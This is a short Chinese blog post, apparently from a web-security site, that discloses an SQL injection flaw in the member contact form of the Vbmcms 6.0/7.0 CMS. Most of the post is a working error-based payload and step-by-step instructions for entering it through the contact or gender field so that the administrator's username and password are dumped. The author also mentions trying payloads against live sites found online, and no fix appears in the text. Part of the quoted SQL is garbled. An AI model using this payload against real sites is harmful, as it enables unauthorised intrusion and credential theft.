最新版本7.0
官网地址http://www.vbmcms.com/index.php
目测全是教育站
由于7.0版本收费 于是在网上下载了6.0免费版本的来看,还发现不少 漏洞 各种insert 注入 各种update注入 但是我构造出语句后去网上找站测试都失败了 7.0补了很多
但是在修改联系方式这里没有过滤
漏洞文件\member\include\inc_base.php
这里都没有过滤直接传入SQ语句
那么随便选一个 选cname吧
构造语句
UPDATE `vb_member` SET qq = ’1141056911′, tel = ’15071810222′ ,cname = ‘ɵµõ’aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(userid,0x3a,pwd)) from my_admin limit 0,1),1,62)))a from information_schema.tables group by a)b)#’, email = ’1141056911@qq.com’ , sex = ‘男’ ERE userid = ‘Sunshie’
然后来到会员中心 在联系方式 吧这里的联系老师 或者性别改成’aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(userid,0x3a,pwd)) from my_admin limit 0,1),1,62)))a from information_schema.tables group by a)b)#(性别用谷歌审查元素修改)
然后点提交
然后密码就爆出来了
查看更多关于Vbmcms6.0&&7.0 update注入及修复 - 网站安全 -的详细内容...